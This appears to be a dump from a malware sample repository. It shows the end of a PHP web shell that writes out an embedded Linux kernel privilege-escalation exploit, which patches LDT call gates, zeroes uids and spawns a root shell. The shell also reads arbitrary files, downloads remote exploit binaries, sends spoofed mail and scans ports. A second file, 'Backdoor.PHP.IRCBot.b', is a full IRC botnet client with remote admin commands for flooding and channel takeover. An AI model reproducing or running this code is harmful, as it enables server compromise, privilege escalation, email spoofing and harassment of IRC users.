" while (addr[0] != uid || addr[1] != uid ||\n" .
" addr[2] != uid || addr[3] != uid)\n" .
" addr++;\n" .
" addr[0] = addr[1] = addr[2] = addr[3] = 0; /* uids */\n" .
" addr[4] = addr[5] = addr[6] = addr[7] = 0; /* uids */\n" .
" addr[8] = 0;\n" .
" /* looking for vma */\n" .
" for (addr = (unsigned *) task_size; addr; addr++) {\n" .
" if (addr[0] >= task_size && addr[1] < task_size &&\n" .
" addr[2] == address && addr[3] >= task_size) {\n" .
" addr[2] = task_size - PAGE_SIZE;\n" .
" addr = (unsigned *) addr[3];\n" .
" addr[1] = task_size - PAGE_SIZE;\n" .
" addr[2] = task_size;\n" .
" break;\n" .
" }\n" .
" }\n" .
"}\n" .
"void kcode(void);\n" .
"#define __str(s) #s\n" .
"#define str(s) __str(s)\n" .
"void __kcode(void)\n" .
"{\n" .
" asm(\n" .
" \"kcode: \\n\"\n" .
" \" pusha \\n\"\n" .
" \" pushl %es \\n\"\n" .
" \" pushl %ds \\n\"\n" .
" \" movl $(\" str(DS) \") ,%edx \\n\"\n" .
" \" movl %edx,%es \\n\"\n" .
" \" movl %edx,%ds \\n\"\n" .
" \" movl $0xffffe000,%eax \\n\"\n" .
" \" andl %esp,%eax \\n\"\n" .
" \" pushl %eax \\n\"\n" .
" \" call kernel \\n\"\n" .
" \" addl $4, %esp \\n\"\n" .
" \" popl %ds \\n\"\n" .
" \" popl %es \\n\"\n" .
" \" popa \\n\"\n" .
" \" lret \\n\"\n" .
" );\n" .
"}\n" .
"void knockout(void)\n" .
"{\n" .
" unsigned * addr = (unsigned *) address;\n" .
" if (mprotect(addr, PAGE_SIZE, PROT_READ|PROT_WRITE) == -1)\n" .
" fatal(\"Unable to change page protection\");\n" .
" errno = ESRCH;\n" .
" if (addr[ENTRY_MAGIC] != MAGIC)\n" .
" fatal(\"Invalid LDT entry\");\n" .
" /* setting call gate and privileged descriptors */\n" .
" addr[ENTRY_GATE+0] = ((unsigned)CS << 16) | ((unsigned)kcode & 0xffffU);\n" .
" addr[ENTRY_GATE+1] = ((unsigned)kcode & ~0xffffU) | 0xec00U;\n" .
" addr[ENTRY_CS+0] = 0x0000ffffU; /* kernel 4GB code at 0x00000000 */\n" .
" addr[ENTRY_CS+1] = 0x00cf9a00U;\n" .
" addr[ENTRY_DS+0] = 0x0000ffffU; /* user 4GB code at 0x00000000 */\n" .
" addr[ENTRY_DS+1] = 0x00cf9200U;\n" .
" prepare();\n" .
" if (setjmp(jmp) != 0) {\n" .
" errno = ENOEXEC;\n" .
" fatal(\"Unable to jump to call gate\");\n" .
" }\n" .
" asm(\"lcall $\" str(GATE) \",$0x0\"); /* this is it */\n" .
"}\n" .
"void shell(void)\n" .
"{\n" .
" char * argv[] = { _PATH_BSHELL, NULL };\n" .
" execve(_PATH_BSHELL, argv, environ);\n" .
" fatal(\"Unable to spawn shell\\n\");\n" .
"}\n" .
"void remap(void)\n" .
"{\n" .
" static char stack[8 MB]; /* new stack */\n" .
" static char * envp[] = { \"PATH=\" _PATH_STDPATH, NULL };\n" .
" static unsigned * m;\n" .
" static unsigned b;\n" .
" m = (unsigned *) sbrk(map_size);\n" .
" if (!m)\n" .
" fatal(\"Unable to allocate memory\");\n" .
" environ = envp;\n" .
" asm (\"movl %0, %%esp\\n\" : : \"a\" (stack + sizeof(stack)));\n" .
" b = ((unsigned)sbrk(0) + PAGE_SIZE - 1) & PAGE_MASK;\n" .
" if (munmap((void*)b, task_size - b) == -1)\n" .
" fatal(\"Unable to unmap stack\");\n" .
" while (b < task_size) {\n" .
" if (sbrk(PAGE_SIZE) == NULL)\n" .
" fatal(\"Unable to expand BSS\");\n" .
" b += PAGE_SIZE;\n" .
" }\n" .
" ldt(m);\n" .
" expand();\n" .
" knockout();\n" .
" shell();\n" .
"}\n" .
"int main(void)\n" .
"{\n" .
" configure();\n" .
" remap();\n" .
" return EXIT_FAILURE;\n" .
"}\n";
$fp = fopen("/tmp/xpl_brk.c", "w");
$ok = fwrite($fp, $kernel);
if (!empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Linux Local Kernel Exploit Was Successfuly Copied</DIV>";
} else {
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Copying Kernel Exploit</DIV>";
}
}
?>
</CENTER>
<pre><font face="Tahoma" size="2">
<?php
// Function to Visualize Source Code files
if ($see != "") {
$fp = fopen($see, "r");
$read = fread($fp, 30000);
echo "============== $see ================<br>";
echo "<textarea name=textarea cols=80 rows=15>";
echo "$read";
Echo "</textarea>";
}
// Function to Dowload Local Xploite Binary COde or Source Code
if ($dx != "") {
$fp = @fopen("$hostxpl",r);
$fp2 = @fopen("$storage","w");
fwrite($fp2, "");
$fp1 = @fopen("$storage","a+");
for (;;) {
$read = @fread($fp, 4096);
if (empty($read)) break;
$ok = fwrite($fp1, $read);
if (empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Uploading File</DIV>";
break;
}
}
if (!empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] File Was Successfuly Uploaded</DIV>";
}
}
flush( );
// Function to visulize Format Color Source Code PHP
if ($sfc != "") {
$showcode = show_source("$sfc");
echo "<font size=4> $showcode </font>";
}
// Function to Visualize all infomation files
if ($fileinfo != "") {
$infofile = stat("$fileanalize");
while (list($info, $value) = each ($infofile)) {
echo" Info: $info Value: $value <br>";
}
}
// Function to send fake mail
if ($fake == 1) {
echo "<FORM METHOD=POST ACTION=%22$SCRIPT_NAME?$QUERY_STRING&send=1/&quot;>";
echo "Your Fake Mail <INPUT TYPE=\"\" NAME=\"yourmail\" size="20"><br>";
echo "Your Cavy:<INPUT TYPE=\"\" NAME=\"cavy\" size="20"><br>";
echo "Suject: <INPUT TYPE=\"text\" NAME=\"subject\" size="20"><br>";
echo "Text: <TEXTAREA NAME=\"body\" ROWS=\"\" COLS=\"\"></TEXTAREA><br>";
echo "<INPUT TYPE=\"hidden\" NAME=\"send\" VALUE=\"1\" size="20"><br>";
echo "<INPUT TYPE=\"submit\" VALUE=\"Send Fake Mail\" size="20">";
echo "</FORM>";
}
if($send == 1) {
if (mail($cavy, $subject, $body, "From: $yourmail\r\n")) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Mail Send Sucessfuly</DIV>";
} else {
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Sending Mail</DIV>";
}
}
if ($portscan != "") {
$port = array ("21","22","23","25","110",);
$values = count($port);
for ($cont=0; $cont < $values; $cont++) {
@$sock[$cont] = Fsockopen($SERVER_NAME, $port[$cont], $oi, $oi2, 1);
$service = Getservbyport($port[$cont],"tcp");
@$get = fgets($sock[$cont]);
echo "<br>Port: $port[$cont] - Service: $service<br><br>";
echo "<br>Banner: $get <br><br>";
flush();
}
}
?>
</font></pre>

640
PHP/Backdoor.PHP.IRCBot.b Normal file
View File

@ -0,0 +1,640 @@
</html>
<?php
//fighter script - ibli
function working() {
$querym=array(
"?",
"!",
"^^",
" ^^",
" :(",
" :)",
" ~:>",
" :P~",
" :D",
",",
".",
"a",
"i",
"u",
"e",
"o",
"z",
"v",
"z",
"x",
"c",
"p",
"m",
"t",
"k",
"b",
"s",
"u",
"bot",
"g",
"lo",
"jo",
"lol"
);
$tsu1=array("`","|","[","]","{","}","^","_");
$tsu2=array("`","|","[","]","{","}","^","-","\\","_");
$nicky=array(
"kaiyoooooo",
"arieeee",
"neotechhh",
"gielahh",
"sashaimoet",
"raracantixs",
"iimgituloch",
"aweGspots",
"tukiyemsss",
"CZzzzzz",
"gunturaja",
"coepiddd",
"shymphonixs",
"kemplungggg",
"eillennnss",
"sebelumcahayaa",
"cecep`gorbachev",
"Kuba`Saku",
"Kisi`Mura",
"weduslucuuuu",
"chodileeeaja",
"YusiKita",
"shymphonix",
"cantikmaisya",
"gracenatalie",
"gukongsss",
"gugunacehh",
"rocheeeee",
"cupidsoloo",
"namakam",
"chynthya",
"MukamuSadaki",
"MasimudaMasupi",
"Akubukaumasuki",
"Daryuss",
"kudi`san",
"TyadaRumah",
"nick5aja",
"po",
"salehooo",
"reebodd",
"Sukiatasi",
"Bg3pl",
"sashaaa",
"legowooozz",
"adeetttt",
"aweeeeezz",
"Defansaku",
"Mama`mia`",
"Gramws",
"valent`Rocsi",
"jinak`",
"kabayannnn",
"Pikachu`",
"Kiwrju",
"heruuuuu",
"reno",
"angklung",
"Cootex",
"Cononge",
"heriiiiii",
"Ampow",
"pingggg",
"payahhhhhh",
);
$usr1=array(
"EnglandChanss",
);
$nick = $nicky[rand(0,count($nicky) - 1)];
$awaymsg = " ";
$identify = '';
$Admin = 'dodolz';
$BOT_PASSWORD = 'servorum';
$channels = '#england';
$remotehst2= array("irc.telkom.net.id");
$remotehost= $remotehst2[rand(0,count($remotehst2) - 1)];
$port = '6667';
$realname = $nick;
$counterfp = 0;
$channels = str_replace("CNL","#",$channels);
print "<body bgcolor=#000000 text=#C0C0C0>";
print "<b>== Connecting to $remotehost...</b>";
$raway = "on";
$log = "off";
$saway = "1";
if (!$stime) { $stime = time(); }
if (!$port) { $port = "6666"; }
$Admin = strtolower($Admin);
$auth = array($Admin => array("name" => $Admin, "pass" => $BOT_PASSWORD, "auth" => 1,"status" => "Admin"));
$username = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)];
$keluar = 0;
$akill = 1;
$katime = 0;
$localhost = 'localhost';
$dayload = date("H:i:s d/m/Y");
ini_set('user_agent','MSIE 5\.5;');
set_time_limit(0);
define ('CRL', "\r\n");
$channels = strtolower($channels)." ";
$channel = explode(" ", $channels);
do {
$fp = fsockopen($remotehost,$port, &$err_num, &$err_msg, 30);
if(!$fp) {
if ( $counterfp <= 200 ) {
$counterfp = $counterfp+1;
working($nick);
}
else {
print "<br><b>Cannot connect to $remotehost!<br>Please Try Another Server!</b>";
$keluar = 1;
exit;
}
}
print "<br><b>== Suceeded connection</b>";
$Header = 'NICK '.$nick . CRL;
$Header .= 'USER '.$username.' '.$localhost.' '.$remotehost.' :'.$realname . CRL;
fputs($fp, $Header);
$response = '';
while (!feof($fp)) {
$response .= fgets($fp, 1024);
while (substr_count($response,CRL) != 0) {
$offset = strpos($response, CRL);
$data = substr($response,0,$offset);
$response = substr($response,$offset+2);
if (substr($data,0,1) == ':') {
$offsetA = strpos($data, ' ');
$dFrom = substr($data,1,$offsetA-1);
$offsetB = strpos($data, ' :');
$dCommand = substr($data,$offsetA+1,$offsetB-$offsetA-1);
$offsetC = strpos($data, '!');
$dNick = substr($data,1,$offsetC-1);
$iText = substr($data,$offsetB+2);
if ( substr($dCommand,0,3) == '004' ) {
fputs($fp, 'PRIVMSG nickserv@services.dal.net :identify '.$nick.' '.$identify. CRL);
if ($nickmode) { fputs($fp, 'MODE '.$nick.' :'.$nickmode . CRL); }
fputs($fp, 'NOTICE ' . $Admin . ' :Halo bos besar!' . CRL);
foreach ($channel as $v) {
fputs($fp, 'JOIN ' .$v . CRL);
}
$pong1 = '1';
}
elseif (substr($dCommand,0,3)=='465') {
print "<br><b>== This bot have been autokilled.</b>";
$akill = 2;
}
elseif (substr($dCommand,0,3)=='433') {
$nick = $nicky[rand(0,count($nicky) - 1)];
fputs($fp, 'NICK '.$nick . CRL);
}
elseif (substr($dCommand,0,3)=='432') {
$nick = $nick.$username;
fputs($fp, 'NICK '.$nick . CRL);
}
if (eregi('.dal.net',$dNick) && $akill==2) {
if (eregi('AKILL ID:',$data) || eregi('Your hostmask is',$data) || eregi('Your IP is',$data)) {
print "<br><b>".strstr($data,'***')." </b>";
if (eregi('Your IP is',$data)) {
$keluar = 1;
exit;
}
}
}
$dcom = explode(" ", $dCommand);
$dNick = strtolower($dNick);
if ($dcom[0]=='KICK' && $dcom[2]==$nick) {
fputs($fp, 'JOIN ' .$dcom[1]. CRL);
}
elseif ($dcom[0]=='NICK' || $dcom[0]=='QUIT' || $dcom[0]=='PART') {
if ($auth["$dNick"]) {
if ($auth["$dNick"]["pass"]) {
if ($auth["$dNick"]["auth"]==2) {
if ($dcom[0]=='NICK') {
$com = explode(" ", $data);
$chnick = strtolower(str_replace(':','',$com[2]));
if ($dNick!=$chnick) {
$auth["$dNick"]["auth"] = 1;
fputs($fp,'NOTICE '.$chnick.' :selamat istirahat bos! ' . CRL);
}
} else { $auth["$dNick"]["auth"] = 1; fputs($fp,'NOTICE '.$dNick.' :selamat istirahat bos! ' . CRL); }
}
} else { fputs($fp,'NOTICE ' . $dNick . ' :pass your pass ' . CRL); }
}
}
elseif ($dcom[0]=='307' && strtolower($dcom[2])==$whois) {
$dcom[2] = strtolower($dcom[2]);
if ($auth["$dcom[2]"]) {
if ($auth["$dcom[2]"]["pass"]) {
if ($auth["$dcom[2]"]["auth"]==1) {
$auth["$dcom[2]"]["auth"] = 2; $whois = "";
fputs($fp,'NOTICE ' . $dcom[2] . ' :kamu masukan password as '.$auth["$dcom[2]"]["status"].' of this bot! ' . CRL);
} else { fputs($fp,'NOTICE ' . $dcom[2] . ' :password oke bos aChOnGs seep emuach di titid! ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dcom[2] . ' :Pass Not Set Yet! Type: pass <your pass> To Set Your Own Password then Auth Again ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dcom[2] . ' :Username Not Found! Change Your Nick then Auth Again ' . CRL); }
}
elseif ($dcom[0]=='NOTICE') {
$com = explode(" ", $data);
if ($com[3]==':_KB' && $com[4] && $com[5] && $com[6]) {
$msg = str_replace('_','',$data);
$msg = strstr($msg,":KB");
$msg = str_replace(":KB $com[4]","",$msg);
fputs($fp, 'KICK '.$com[4].' '.$com[5].' :'.$msg . CRL);
fputs($fp, 'MODE '.$com[4].' +b *!*'.$com[6] . CRL);
}
}
elseif ($dcom[0]=='PRIVMSG') {
$com = explode(" ", $data);
if ($com[3]==':_VERSION_') {
fputs($fp,'NOTICE '.$dNick.' :'.chr(1).'VERSION mIRC v6.16 Khaled Mardam-Bey'.chr(1) . CRL);
}
elseif ($auth["$dNick"]["status"] && $com[3]==':auth' && $com[4]) {
if ($auth["$dNick"]) {
if ($auth["$dNick"]["pass"]) {
if ($auth["$dNick"]["auth"]==1) {
if ($com[4]===$auth["$dNick"]["pass"]) {
$auth["$dNick"]["auth"] = 2;
fputs($fp,'NOTICE ' . $dNick . ' :kamu masukkan password as '.$auth["$dNick"]["status"].' of this bot! ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :passworde salah syu! Auth salah Shu! ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :password bener bos aChOnGs emang oke! ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Pass Not Set Yet! Type: pass <your pass> To Set Your Own Password then Auth Again ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Auth Again ' . CRL); }
}
elseif ($auth["$dNick"]["status"] && $com[3]==':deauth') {
if ($auth["$dNick"]) {
if ($auth["$dNick"]["pass"]) {
if ($auth["$dNick"]["auth"]==2) {
$auth["$dNick"]["auth"] = 1;
fputs($fp,'NOTICE ' . $dNick . ' :You`re LogOut! ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :You`re Already LogOut! ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Pass Not Set Yet! Type: pass <your pass> To Set Your Own Password then Auth Again ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Auth Again ' . CRL); }
}
elseif ($auth["$dNick"]["status"] && $com[3]==':pass' && $com[4]) {
if ($auth["$dNick"]) {
if (!$auth["$dNick"]["pass"]) {
$auth["$dNick"]["pass"] = $com[4];
$auth["$dNick"]["auth"] = 1;
fputs($fp,'NOTICE ' . $dNick . ' :Your Auth Pass set to '.$auth["$dNick"]["pass"].', Type: auth <your pass> To Authorized Imediately! ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :Pass Already Set! Type: auth <your pass> To Get Authorized ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Pass Again ' . CRL); }
}
elseif ($auth["$dNick"]["status"] && $com[3]==':chgpass' && $com[4] && $com[5]) {
if ($auth["$dNick"]) {
if ($auth["$dNick"]["auth"]==2) {
if ($com[4]===$auth["$dNick"]["pass"]) {
$auth["$dNick"]["pass"] = $com[5];
fputs($fp,'NOTICE ' . $dNick . ' :Your New Auth Pass set to '.$auth["$dNick"]["pass"].', Type: auth <your pass> To Authorized Imediately! ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :Your Old Pass Wrong! Type: chgpass <old pass> <new pass> To Change Your Auth Pass ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Please Auth First! Type: auth <your pass> To Authorized ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Pass Again ' . CRL); }
}
elseif ($auth["$dNick"]["status"] && $com[3]==':adduser' && $com[4] && $com[4]!=$nick && $com[5]) {
$com[4] = strtolower($com[4]);
if ($auth["$dNick"]["auth"]==2) {
if ($auth["$dNick"]["status"]=="Admin") {
if ($com[5]=="master" || $com[5]=="user") {
$auth["$com[4]"]["name"] = $com[4];
$auth["$com[4]"]["status"] = $com[5];
fputs($fp,'NOTICE ' . $dNick . ' :AddUser :'.$com[4].' As My '.$com[5] . CRL);
fputs($fp,'NOTICE ' . $com[4] . ' :You`re Now Known As My '.$com[5].' Added By '.$dNick.' Now Type: pass <your pass> To Set Your Pass ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :salah Command! Type: adduser <nick> <master/user> ' . CRL); }
} elseif ($auth["$dNick"]["status"]=="master") {
if (!$auth["$com[4]"]) {
if ($com[5]=="user") {
$auth["$com[4]"]["name"] = $com[4];
$auth["$com[4]"]["status"] = $com[5];
fputs($fp,'NOTICE ' . $dNick . ' :AddUser :'.$com[4].' As My '.$com[5] . CRL);
fputs($fp,'NOTICE ' . $com[4] . ' :You`re Now Known As My '.$com[5].' Added By '.$dNick.' Now Type: pass <your pass33] <Spyderur Pass ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :Wrong Command! Type: adduser <nick> user ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :User Already Exist! Aborting AddUser! ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Unknown Status! Your Status is '.$auth["$dNick"]["status"] . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Please Auth First! Type: auth <your pass> To Authorized ' . CRL); }
}
elseif ($auth["$dNick"]["status"] && $com[3]==':deluser' && $com[4]) {
$com[4] = strtolower($com[4]);
if ($auth["$dNick"]["auth"]==2) {
if ($auth["$dNick"]["status"]=="Admin") {
if ($auth["$com[4]"]["status"]=="master" || $auth["$com[4]"]["status"]=="user") {
unset($auth["$com[4]"]);
fputs($fp,'NOTICE ' . $dNick . ' :DelUser :'.$com[4].' From My UserList ' . CRL);
fputs($fp,'NOTICE ' . $com[4] . ' :Your Access As My User Has Been Deleted By '.$dNick . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :Wrong Command! Type: deluser <nick> ' . CRL); }
} elseif ($auth["$dNick"]["status"]=="master") {
if ($auth["$com[4]"]["status"]=="user") {
unset($auth["$com[4]"]);
fputs($fp,'NOTICE ' . $dNick . ' :DelUser :'.$com[4].' From My UserList ' . CRL);
fputs($fp,'NOTICE ' . $com[4] . ' :Your Access As My User Has Been Deleted By '.$dNick . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :Wrong Command! Type: deluser <nick> ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Unknown Status! Your Status is '.$auth["$dNick"]["status"] . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Please Auth First! Type: auth <your pass> To Authorized ' . CRL); }
}
elseif ($auth["$dNick"]["status"]) {
if (ereg(":`",$com[3]) || ereg(":!",$com[3])) {
$chan = strstr($dCommand,"#");
$anick = str_replace("PRIVMSG ","",$dCommand);
if ($com[3]==':!auth') {
if ($auth["$dNick"]["auth"]==2) {
fputs($fp,'NOTICE '.$dNick.' :Jembutz..! You`re already Authorized!' . CRL);
} else {
$whois = $dNick;
fputs($fp,'WHOIS '.$dNick . CRL);
}
} elseif ($com[3]==':`auth' && $chan) {
if ($auth["$dNick"]["auth"]==2) {
fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.' Hamba siap mencari janda Bos!' . CRL);
} else { fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.' Raimu bukan bosku cok!' . CRL); }
} elseif ($auth["$dNick"]["auth"]==2) {
if ($com[3]==':`say' && $com[4] && $chan) {
$msg = strstr($data,":`say");
$msg = str_replace(":`say ","",$msg);
fputs($fp,'PRIVMSG '.$chan.' :'.$msg. CRL);
}
elseif ($com[3]==':`act' && $com[4] && $chan) {
$msg = strstr($data,":`act");
$msg = str_replace(":`act ","",$msg);
fputs($fp,'PRIVMSG '.$chan.' :_ACTION '.$msg.'_'. CRL);
}
elseif ($com[3]==':`slap' && $com[4] && $chan) {
fputs($fp,'PRIVMSG '.$chan.' :_ACTION slaps '.$com[4].' Jembut Raimu wani karo bosku around a bit with a large trout_'. CRL);
}
elseif ($com[3]==':`msg' && $com[4] && $com[5]) {
$msg = strstr($data,":`msg");
$msg = str_replace(":`msg $com[4] ","",$msg);
fputs($fp,'PRIVMSG '.$com[4].' :'.$msg. CRL);
}
elseif ($com[3]==':`notice' && $com[4] && $com[5]) {
$msg = strstr($data,":`notice");
$msg = str_replace(":`notice $com[4] ","",$msg);
fputs($fp,'NOTICE '.$com[4].' :'.$msg. CRL);
}
elseif ($com[3]==':`ctcp' && $com[4] && $com[5]) {
$msg = strstr($data,":`ctcp");
$msg = str_replace(":`ctcp $com[4] ","",$msg);
fputs($fp,'PRIVMSG '.$com[4].' :_'.$msg.'_'. CRL);
}
elseif ($com[3]==':`ping' && $chan) {
$sml = $smile[rand(0,count($smile) - 1)];
fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.', _PONG!_ '.$sml. CRL);
}
elseif ($com[3]==':`pong' && $chan) {
$sml = $smile[rand(0,count($smile) - 1)];
fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.', _PING!_ '.$sml. CRL);
}
elseif ($com[3]==':`info' && $auth["$dNick"]["status"]=="Admin") {
$bhost = $_SERVER['HTTP_HOST'];
$bphp = $_SERVER['PHP_SELF'];
fputs($fp,'NOTICE '.$dNick.' :Bot Host: '.$bhost.', Bot PHP: '.$bphp. CRL);
}
elseif ($com[3]==':`up' && $chan) {
fputs($fp, 'PRIVMSG chanserv@services.dal.net :op '.$chan.' '.$nick . CRL);
}
elseif ($com[3]==':`down' && $chan) {
fputs($fp, 'MODE '.$chan.' +v-o '.$nick.' '.$nick . CRL);
}
elseif ($com[3]==':`tsunami' && $com[4] && $auth["$dNick"]["status"]!="user") {
$nicktsu = $tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)];
fputs($fp, 'NICK '.$nicktsu . CRL);
if (substr($dCommand,0,3)=='433') {
$nicktsu = $tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)];
fputs($fp, 'NICK '.$nicktsu . CRL);
}
$msg = strstr($data,":`tsunami");
$msg = str_replace(":`tsunami $com[4]","",$msg);
if (ereg("#", $com[4])) {
fputs($fp, 'JOIN '.$com[4] . CRL);
}
fputs($fp, 'PRIVMSG '.$com[4].' :_'.$msg.'____________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);
fputs($fp, 'NOTICE '.$com[4].' :_'.$msg.'____________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);
fputs($fp, 'PRIVMSG '.$com[4].' :_TSUNAMI _'.$msg.'_____________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);
fputs($fp, 'PRIVMSG '.$com[4].' :_'.$msg.'____________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);
fputs($fp, 'NOTICE '.$com[4].' :_'.$msg.'____________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);
fputs($fp, 'PRIVMSG '.$com[4].' :_FLOOD _'.$msg.'_____________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);
if (ereg("#", $com[4])) {
fputs($fp, 'PART '.$com[4].' :Complete' . CRL);
fputs($fp, 'NICK '.$nick . CRL);
} else {
fputs($fp, 'NICK '.$nick . CRL);
}
}
elseif ($com[3]==':`cycle' && $chan && $auth["$dNick"]["status"]!="user") {
$msg = strstr($data,":`cycle");
if (ereg("#", $com[4])) {
$partchan = $com[4];
$msg = str_replace(":`cycle $com[4]","",$msg);
} else {
$partchan = $chan;
$msg = str_replace(":`cycle","",$msg);
}
if (strlen($msg)<3) {
$msg = '';
}
fputs($fp, 'PART '.$partchan.' :_'.$msg . CRL);
fputs($fp, 'JOIN '.$partchan . CRL);
}
elseif ($com[3]==':`part' && $auth["$dNick"]["status"]=="Admin") {
$msg = strstr($data,":`part");
if (ereg("#", $com[4])) {
$partchan = $com[4];
$msg = str_replace(":`part $com[4]","",$msg);
} else {
$partchan = $chan;
$msg = str_replace(":`part","",$msg);
}
if (strlen($msg)<3) {
$msg = '';
}
fputs($fp, 'PART '.$partchan.' :_'.$msg . CRL);
$remchan = strtolower($partchan);
if (in_array($remchan, $channel)) {
$channels = str_replace("$remchan ","",$channels);
unset($channel);
$channel = explode(" ", $channels);
}
foreach ($channel as $v) {
fputs($fp, 'JOIN '.$v . CRL);
}
}
elseif ($com[3]==':`join' && $com[4] && $auth["$dNick"]["status"]=="Admin") {
if (!ereg("#",$com[4])) { $com[4]="#".$com[4]; }
$addchan = strtolower($com[4]);
if (!in_array($addchan, $channel)) {
$channel[]=$addchan;
$channels.="$addchan ";
}
foreach ($channel as $v) {
sleep(rand(1,6));
fputs($fp, 'JOIN '.$v . CRL);
}
}
elseif ($com[3]==':`botnick' && $com[4] && !$chan && $auth["$dNick"]["status"]=="Admin") {
$nick = $com[4];
$identify = $com[5];
fputs($fp, 'NICK '.$nick . CRL);
fputs($fp, 'PRIVMSG nickserv@services.dal.net :identify '.$nick.' '.$identify. CRL);
}
elseif ($com[3]==':`k' && $com[4] && $chan) {
$msg = strstr($data,":`k");
$msg = str_replace(":`k $com[4]","",$msg);
fputs($fp, 'KICK '.$chan.' '.$com[4].' :'.$msg . CRL);
}
elseif ($com[3]==':`kb' && $com[4] && $chan) {
$msg = strstr($data,":`kb");
$msg = str_replace(":`kb $com[4]","",$msg);
fputs($fp, 'KICK '.$chan.' '.$com[4].' :'.$msg . CRL);
fputs($fp, 'MODE '.$chan.' +b '.$com[4] . CRL);
}
elseif ($com[3]==':`ganti') {
$nick = $nicky[rand(0,count($nicky) - 1)];
fputs($fp, 'NICK '.$nick . CRL);
if (substr($dCommand,0,3)=='433') {
$nick = $nicky[rand(0,count($nicky) - 1)];
fputs($fp, 'NICK '.$nick . CRL);
}
}
elseif ($com[3]==':`op' && $chan) {
if ($com[4]) { $opnick = $com[4]; }
else { $opnick = $dNick; }
fputs($fp, 'MODE '.$chan.' +ooo '.$opnick.' '.$com[5].' '.$com[6] . CRL);
}
elseif ($com[3]==':`deop' && $chan) {
if ($com[4]) { $opnick = $com[4]; }
else { $opnick = $dNick; }
fputs($fp, 'MODE '.$chan.' -o+v-oo '.$opnick.' '.$opnick.' '.$com[5].' '.$com[6] . CRL);
}
elseif ($com[3]==':`v' && $chan) {
if ($com[4]) { $vonick = $com[4]; }
else { $vonick = $dNick; }
fputs($fp, 'MODE '.$chan.' +vvv '.$vonick.' '.$com[5].' '.$com[6] . CRL);
}
elseif ($com[3]==':`dv' && $chan) {
if ($com[4]) { $vonick = $com[4]; }
else { $vonick = $dNick; }
fputs($fp, 'MODE '.$chan.' -vvv '.$vonick.' '.$com[5].' '.$com[6] . CRL);
}
elseif ($com[3]==':`awaymsg' && $auth["$dNick"]["status"]=="Admin") {
$msg = strstr($data,":`awaymsg");
$msg = str_replace(":`awaymsg","",$msg);
if (strlen($msg)<3) {
$raway="on";
fputs($fp,'AWAY : ' . 'AWAY' . CRL);
} else {
$raway="off";
fputs($fp,'AWAY : ' . $msg . CRL);
}
}
elseif ($com[3]==':`mode' && $com[4] && $chan) {
fputs($fp, 'MODE '.$chan.' :'.$com[4].' '.$com[5] . CRL);
}
